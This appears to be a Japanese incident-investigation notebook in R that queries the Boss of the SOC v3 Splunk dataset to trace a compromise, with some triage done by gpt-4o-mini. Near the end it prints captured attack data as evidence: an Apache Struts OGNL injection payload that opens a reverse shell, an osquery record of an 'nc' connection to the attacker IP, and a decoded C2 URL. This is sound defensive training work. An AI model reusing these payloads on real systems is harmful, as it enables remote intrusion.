pacman::p_load(tidyverse, reticulate)
mp <- import("msticpy")
qry_splunk <- mp$QueryProvider("Splunk")
qry_splunk$connect()Credential loading from msticpyconfig.yaml file.
username/password method is selected.
Connected.
この文書は、Splunkを用いたログ調査の過程記録手法の一例を示すものです。題材には、インデックスが公開されている Boss of the SOC v3のデータセットを用います。インデックス名はbotsv3です。
調査に先立ち、SplunkにAPI接続してデータが取得できるかどうかを試験します。API接続には、Microsoftが提供するMSTICPyというツールをラッパーとして利用します。このツールは名前が示唆する通りPythonモジュールですが、私はR使いなので、Reticulateパッケージを用いてRから利用します。
pacman::p_load(tidyverse, reticulate)
mp <- import("msticpy")
qry_splunk <- mp$QueryProvider("Splunk")
qry_splunk$connect()Credential loading from msticpyconfig.yaml file.
username/password method is selected.
Connected.
正常に接続できています。
次に、標準搭載されているデータに簡単なクエリを投げ、データフレームを表示させます。
MSTICPyはtableを自動的にPandasデータフレームに変換します。そしてReticulateパッケージは、Pandasデータフレームをそのまま扱えます。
spl <- r"(
| inputlookup security_example_data.csv
| table timestamp threat_src_ip threat_dest_ip threat_status threat_type
| head 5
)"
df_1st <- qry_splunk$exec_query(spl, timeout=300)
df_1stデータフレームが表示できています。なお、SplunkのAPIを経由すると、フィールドの型がすべて文字列になる点に留意してください。(これはSplunk側の仕様です。)
うまくいきました。それでは調査に着手しましょう。以下では臨場感を出すために、常体を用いるようにします。
# AIのMarkdownを地と区別するための補助関数
ai_out <- function(x){
ai_block <- paste0(
"::: {.callout-tip title='AIの回答'}\n\n",
x,
"\n\n:::"
)
ai_block |> knitr::asis_output()
}
# インタラクティブなテーブルにするための補助関数
pacman::p_load(DT)
create_dt <- function(x){
DT::datatable(
x,
filter = 'top',
options = list(
autoWidth = TRUE,
scrollX = TRUE,
scrollY = "400px",
dom = 'Blfrtip',
buttons = c('copy', 'csv', 'excel', 'pdf', 'print')
),
extensions = 'Buttons',
)
}インデックスにどんなイベントが記録されているか、まったく分からない。(公式ウェブサイトにはsourcetypeは記載されている。)まず、hostとsourcetypeとを一覧化する。行数や初出・終出を合わせて出しておくと得られるものがあるかもしれない。
spl <- r"(
search index=botsv3 earliest=0
| stats count, earliest(_time) as first_seen,
latest(_time) as last_seen by host, sourcetype
)"
df_host <- qry_splunk$exec_query(spl, timeout=300)
df_host_m <-
df_host |>
as_tibble() |>
mutate(
count = as.integer(count),
first_seen = as.double(first_seen) |> as_datetime(tz = "UTC"),
last_seen = as.double(last_seen) |> as_datetime(tz = "UTC")
)
create_dt(df_host_m)全部で30ホストある。たとえば「-L」で終わるホスト名はWindows端末だろう。推測をOpenAIにやらせてみる。
csv_host <-
df_host_m |>
select(host, sourcetype) |>
format_csv()
q_ai <- str_c(
"次のデータを、hostフィールドの値のパターンに従って分類し、結果を示してください。
sourcetypeフィールドからOSや環境が推測できるなら、それも加えてください。
分類名, ホスト名, 付加情報の順で、1ホストを1行で出力してください。
分類不明なものは、分類名を不明としてください。",
"データ:\n",
csv_host)
pacman::p_load(ellmer)
chat <- chat_openai(model = "gpt-4o-mini")
ans <- chat$chat(q_ai, echo = "none")
ai_out(ans)以下が、指定されたデータを分類した結果になります。
Windows, ABUNGST-L, Windows OS
Windows, BGIST-L, Windows OS
Windows, BSTOLL-L, Windows OS
Windows, BTUN-L, Windows OS
Windows, FYODOR-L, Windows OS
Windows, JWORTOS-L, Windows OS
Windows, MKRAEUS-L, Windows OS
Windows, PCERF-L, Windows OS
Windows, SEPM, Windows OS
不明, console.us.code42.com:443, 不明
Unix, gacrux.i-06fea586f3d3c8ce8, Linux
Unix, gacrux.i-0920036c8ca91e501, Linux
Unix, gacrux.i-09cbc261e84259b54, Linux
Unix, gacrux.i-0cc93bade2b3cba63, Linux
Unix, hoth, Linux
不明, ip-172-16-0-109.ec2.internal, 不明
不明, ip-172-16-0-127, 不明
不明, ip-172-16-0-13, 不明
不明, ip-172-16-0-145, 不明
不明, ip-172-16-0-178, 不明
不明, ip-172-31-12-76, 不明
不明, ip-172-31-36-235, 不明
Unix, mars.i-08e52f8b5a034012d, Linux
不明, matar, 不明
不明, ntesla, 不明
不明, serverless, 不明
不明, splunk.froth.ly, 不明
不明, splunkhwf.froth.ly, 不明
注釈: - 分類は「Windows」または「Unix」に基づいています。- 不明な分類は、ホスト名やデータが特定できなかった場合に設定されています。
ans <- chat$chat("splunk.froth.lyというホストには、どんなデータがありますか?",
echo = "none")
ai_out(ans)ホスト名 splunk.froth.ly には以下のデータが含まれています:
このホストでは、AWS関連のログやMicrosoftのAAD及びO365の監査データが収集されています。
ここではMicrosoft 365関係のデータに注目する。
有用なフィールドの有無をチェックするため、サマリをとる。
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| fieldsummary
)"
df_aadsignin_sum <- qry_splunk$exec_query(spl, timeout=300)
create_dt(df_aadsignin_sum)Azure ADのサインインログを取得するAPIには、1.0とBetaとの2つのバージョンがある。今回は1.0が使用されているようで、フィールドが限定的である。少なくともsrc_ipのASNは知りたいところだ。このSplunkにはエンリッチメントのためのAppを入れていないので、ip-apiを使って手元でエンリッチメントできるようにしておく。
pacman::p_load(httr2)
# IPアドレスを問い合わせてASNを取得する(非ベクトル関数)
get_asn <- function(ip) {
url <- str_glue("http://ip-api.com/json/{ip}?fields=as")
resp <- tryCatch(
request(url) |> req_throttle(rate = 4/10) |>
req_perform() |> resp_body_json(),
error = function(e) return(list(as = NA))
)
resp$as
}
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| fields src_ip
| dedup src_ip
| table src_ip
| sort 0 src_ip
)"
df_src <- qry_splunk$exec_query(spl, timeout=300)
df_src_enriched <-
df_src |>
mutate(asn = map_chr(src_ip, get_asn)) |>
mutate(asn = if_else(asn == "", "--", asn))
df_src_enriched現時点ではASNが引けないIPアドレスも存在するようだ。
src_ip別にサインイン状況を点検する。それにはvalues()が有効だが、データフレームで多値フィールドを扱うとリストになるので、リストの要素を出力するためには展開しなくてはならない。以下では、展開と合わせてエンリッチメントを行う。
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| table _time, app, user, src_ip, location.country, loginStatus, deviceInformation
| stats values(*), earliest(_time) as first_seen, latest(_time) as last_seen by src_ip
)"
df_aadsignin <- qry_splunk$exec_query(spl, timeout=300)
df_aad_enriched <-
df_aadsignin |>
mutate(
first_seen = as.double(first_seen) |> as_datetime(tz = "UTC"),
last_seen = as.double(last_seen) |> as_datetime(tz = "UTC")
) |>
janitor::clean_names() |>
mutate(across(
starts_with("values_"),
~ map_chr(.x, ~ str_c(.x, collapse = " | "))
)) |>
rename_with(~ str_remove(.x, "^values_"), starts_with("values_")) |>
inner_join(df_src_enriched, by = "src_ip") |>
select(src_ip, location_country, first_seen, last_seen, asn, user, device_information, login_status, app)
create_dt(df_aad_enriched)先頭行のsrc_ip=“104.207.83.63”(HK)には注目する価値がある。device_information欄を見ると、このIPアドレスだけWindows 7で、aBrowswer 3.5という特異な文字列がある。
また、src_ip=“157.97.121.132”およびsrc_ip=“199.66.91.253”も、2つのuserからのサインインがある。この3つのIPアドレスと関連するユーザーは、bgist、fyodor、bstoll、klagerfieldの4アカウント。これらのサインイン履歴を見てみよう。
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
src_ip IN ("104.207.83.63", "157.97.121.132", "199.66.91.253")
| table _time, app, user, src_ip, location.country, loginStatus, deviceInformation
| sort_time
)"
df_aadsignin2 <- qry_splunk$exec_query(spl, timeout=300)
df_aadsignin2 <-
df_aadsignin2 |>
janitor::clean_names() |>
mutate(time = as_datetime(time))
create_dt(df_aadsignin2)サインインログにはExchangeの痕跡が見つかるので、メール追跡ログから先の3つのIPアドレスを検索する。
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:o365:reporting:messagetrace"
src IN ("104.207.83.63", "157.97.121.132", "199.66.91.253")
| table _time, size, src, orig_src, orig_recipient, subject, action, MessageTraceId
| sort _time
)"
df_msgt <- qry_splunk$exec_query(spl, timeout=300)
df_msgt <-
df_msgt |>
as_tibble() |>
janitor::clean_names() |>
mutate(time = as_datetime(time))
create_dt(df_msgt)bgistが社内の他者にメールを送っている。2種類のsubjectのうち前者の「Draft Financial Plan for Brewery FY2019」は、最初のメールが検疫隔離されている。サイズから、添付ファイルが存在していた恐れがある。配信された2度目はサイズが小さくなっているので、攻撃者はリンク型などに切り替えているかもしれない。
続いて、これらのIPアドレスを統合監査ログから追う。
spl <- r"(
search index=botsv3 earliest=0
sourcetype="o365:management:activity"
("104.207.83.63" OR "157.97.121.132" OR "199.66.91.253")
| table _time, src, action, command, authentication_service, file_name, record_type, user_id, user_agent
| sort _time
)"
df_ual <- qry_splunk$exec_query(spl, timeout=300)
df_ual <-
df_ual |>
as_tibble() |>
janitor::clean_names() |>
mutate(time = as_datetime(time))
create_dt(df_ual)興味深い点が複数ある。
サインイン、メール追跡、統合監査の3つのログを元に、疑わしい2つのIPアドレス104.207.83.63と199.66.91.253とに関し、userとsrc_ipとでプロットする。
pacman::p_load(scales)
df_msgt_pr <-
df_msgt |>
janitor::clean_names() |>
select(time, src, orig_src) |>
rename(user = orig_src, src_ip = src) |>
mutate(
time = as_datetime(time, tz = "UTC"),
log_src = "message"
)
df_aad_pr <-
df_aadsignin2 |>
janitor::clean_names() |>
filter(src_ip %in% c("104.207.83.63", "199.66.91.253")) |>
select(time, src_ip, user) |>
mutate(
time = as_datetime(time, tz = "UTC"),
log_src = "aad"
)
df_ual_pr <-
df_ual |>
janitor::clean_names() |>
rename(user = user_id) |>
mutate(
time = as_datetime(time, tz = "UTC"),
src_ip = str_split_i(src, ":", 1),
log_src = "ual"
) |>
select(time, user, src_ip, log_src)
df_m365_tmp <-
df_aad_pr |>
bind_rows(df_msgt_pr) |>
bind_rows(df_ual_pr)
p_m365 <-
df_m365_tmp |>
group_by(user) |>
mutate(first_seen = min(time)) |>
ungroup() |>
ggplot(mapping = aes(x = time, y = reorder(user, desc(first_seen)),
shape = src_ip, color = log_src)) +
geom_point(alpha = 0.4, size = 2) +
scale_x_datetime(breaks = breaks_width("30 min"),
minor_breaks = breaks_width("5 min"),
labels = label_time("%H:%M")) +
labs(x = "2018-08-20 (UTC)", y = "")
p_m365
archive.tarの出元を確認する。
spl <- r"(
search index=botsv3 earliest=0
sourcetype=xmlwineventlog TERM(archive.tar)
| table _raw
)"
df_archive <- qry_splunk$exec_query(spl, timeout=300)
str_archive <- df_archive |> flatten_chr()
df_archivearchive.tarはsysmonで捕捉されている。XMLをパースするかわりに、OpenAIに要点を問い合わせる。
q_ai <- str_c(
"侵害調査をしていて、archive.tarがダウンロードされたことを確認しました。
このXMLデータは、archive.tarが生成されたことと関係していますか?",
"データ:\n",
str_archive)
chat <- chat_openai(model = "gpt-4o-mini")
ans <- chat$chat(q_ai, echo = "none")
ai_out(ans)はい、このXMLデータはarchive.tarが生成されたことと関係しています。
XMLデータの中で、特に注目すべきポイントは以下の通りです:
<EventID>1</EventID>: これは新しいプロセスの作成を示すSysmonイベントです。<Image>C:\Windows\System32\tar.exe</Image>: これはtar.exeがプロセスとして実行されたことを示しています。<CommandLine>"C:\Windows\system32\tar.exe" -cvzf archive.tar *</CommandLine>: ここで、tarコマンドが-cvzf archive.tar *の引数で実行されています。-cは新しいアーカイブの作成、-vは詳細を表示、-zはgzip圧縮、-fはファイル名を指定しています。この場合、archive.tarという名前のアーカイブが生成されています。また、現在の作業ディレクトリはC:\Users\FyodorMalteskesko\OneDrive - Frothly\で、UserはNT AUTHORITY\SYSTEMとなっているため、システム権限でこのコマンドが実行されたことが分かります。
このデータに基づいて、archive.tarは確かに.tarファイルとして生成されたことが示されており、それに関連する操作が行われたと確認できます。
親プロセスがPowerShellであることから、遠隔操作されている恐れを考える。そこで、Windowsイベントログから、当該ホスト「FYODOR-L」において「FromBase64String」というキーワードの記録を探ってみる。
spl <- r"(
search index=botsv3 earliest=0
sourcetype=WinEventLog
host="FYODOR-L" FromBase64String
| table _raw
)"
df_fydorl_base64 <- qry_splunk$exec_query(spl, timeout=300)
str_fydorl_base64 <- df_fydorl_base64 |> flatten_chr()
q_ai <- str_c(
"侵害調査をしています。端末FYODOR-Lにおいて、FromBase64Stringを持つ
Windowsイベントを抽出したところ、以下のデータが得られました。
状況を簡潔に説明し、IoCとして利用可能なIPアドレスやキーワードを出力してください。",
"データ:\n",
str_fydorl_base64)
chat <- chat_openai(model = "gpt-4o-mini")
ans <- chat$chat(q_ai, echo = "none")
ai_out(ans)端末FYODOR-Lにおいて、PowerShellを介して実行されたスクリプトが検出されました。スクリプトは、リモートコマンドを実行する際にPowerShellのスクリプトブロックロギングを無効にする命令を含んでおり、システムの保護機能を回避しようとしています。また、HTTPリクエストを通じて悪意のあるサーバーにデータを送信している可能性があります。これにより、攻撃者がマルウェアやその他の悪意のあるコードを実行していることが示唆されます。
http://45.77.53.17/news.php (Base64デコードを行った場合に出現)http://45.77.53.17/login/process.php (Base64デコードを行った場合に出現)http://45.77.53.17/admin/get.php (Base64デコードを行った場合に出現)このイベントログは、悪意ある活動が端末で行われている可能性を示す重要な証拠です。IPアドレスや上記のキーワードを使用して、追加の調査を行うことが推奨されます。
残念。IPアドレスを正しく抽出してくれなかった。自分で出力する。(第4オクテットに注目。LLMにとっては1バイトの違いだが、IoCとしては大違いだ。なお、コンパイル時によってはIPアドレスを正しく抽出してくれるときもある。このように、OpenAIの出力は必ずしも安定していない。)
b64str <- "aAB0AHQAcABzADoALwAvADQANQAuADcANwAuADUAMwAuADEANwA2ADoANAA0ADMA"
rawstr <- jsonlite::base64_dec(b64str)
raw_clean <- rawstr[rawstr != as.raw(0x00)]
rawToChar(raw_clean)[1] "https://45.77.53.176:443"
45.77.53.176と関連するhostを調べる。
spl <- r"(
search index=botsv3 earliest=0
TERM(45.77.53.176)
| stats count by host
| sort 0 -count
)"
df_host_45 <- qry_splunk$exec_query(spl, timeout=300)
df_host_45splunkhfwはやSEPMのように、ログで使われていると思えるものもあるし、FYODOR-LやABUNGST-Lは本IPとC2ビーコン通信を行っているようだ。hothやmatarは不明。
先の例ではポート番号が443だったもののプロトコルはHTTPだったので、stream:httpも見ておく。先頭1件だけ、以下に表示する。
spl <- r"(
search index=botsv3 earliest=0
TERM(45.77.53.176)
sourcetype="stream:http"
| head 1
| table *
)"
df_http_45 <- qry_splunk$exec_query(spl, timeout=300)
df_http_45 |>
janitor::clean_names() |>
select(time, src_ip, dest_ip, dest_port, uri_path, http_method, http_user_agent, form_data) |>
pivot_longer(everything(), names_to = "field", values_to = "value") |>
knitr::kable()| field | value |
|---|---|
| time | 2018-08-20T11:34:01.509+00:00 |
| src_ip | 192.168.8.103 |
| dest_ip | 192.168.9.30 |
| dest_port | 8080 |
| uri_path | /frothlyinventory/integration/saveGangster.action |
| http_method | POST |
| http_user_agent | python-requests/2.18.4 |
| form_data | age=1&__checkbox_bustedBefore=true&name=${(#szgx=‘multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘/bin/sh 0/tmp/backpipe’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,‘/c’,#cmd}:{‘/bin/bash’,‘-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}&description=1 |
Apache Strutsの脆弱性を利用して、45.77.53.176に対してリバースシェルを張ろうとしているようである。そしてその試みは、OSQeuryの結果を見ると成功しているようだ。
spl <- r"(
search index=botsv3 earliest=0
host=hoth sourcetype="osquery:results"
"45.77.53.176"
| head 1
| fields - _raw, date*, ssl*
| table *
)"
df_osq_45 <- qry_splunk$exec_query(spl, timeout=300)
df_osq_45 |>
as_tibble() |>
janitor::clean_names() |>
select(time, action, columns_cmdline, columns_owner_uid, columns_path, columns_pid, columns_parent) |>
rename_with(~ str_remove(.x, "^columns_"), starts_with("columns_")) |>
pivot_longer(everything(), names_to = "field", values_to = "value") |>
knitr::kable()| field | value |
|---|---|
| time | 2018-08-20T11:34:49.000+00:00 |
| action | added |
| cmdline | “nc” “45.77.53.176” “8088” |
| owner_uid | 0 |
| path | /bin/nc.traditional |
| pid | 17211 |
| parent |
(調査はつづく……)
こんなふうに、考えたこととコードと結果とを合わせて記述することを、私は「文芸的ログ分析」と呼んでいます。むかし長久勝さんの「文芸的コンピューティング」に感銘を受け、ログ分析に適用することを考えていたものです。ここ数年で、MSTICPyやQuartoなど必要なピースがそろい、容易に実現できるようになりました。
RStudio Server上で分析を進める利点は、Splunk以外のデータソース(たとえばMicrosoft SentinelやElasticsearch、ひいては単純なテキストファイル)からもデータ取得可能なことです。また、QuartoからはPythonコードもBashコマンドも実行できますから、JSONデータの前処理にjqを使ってデータフレームに戻すこともできます。
いくつか注意点を記載します。
あらゆるログ分析を文芸的にやるのは、手間がかかりすぎます。何らかの理由で後日に残しておきたいものから着手するのがよいでしょう。
ログ分析の過程でも、マークダウン形式だけに依存すべきではありません。私はWebコンソールもRスクリプトも併用しますし、何より手で絵を描いたりノートを取ったりしています。
サーチ結果の量が大きくなるとき(たとえば長期間のデータ)には、MSTICPyを使わずCSVファイルに出力し、それをデータフレームに読み込むほうが効率的です。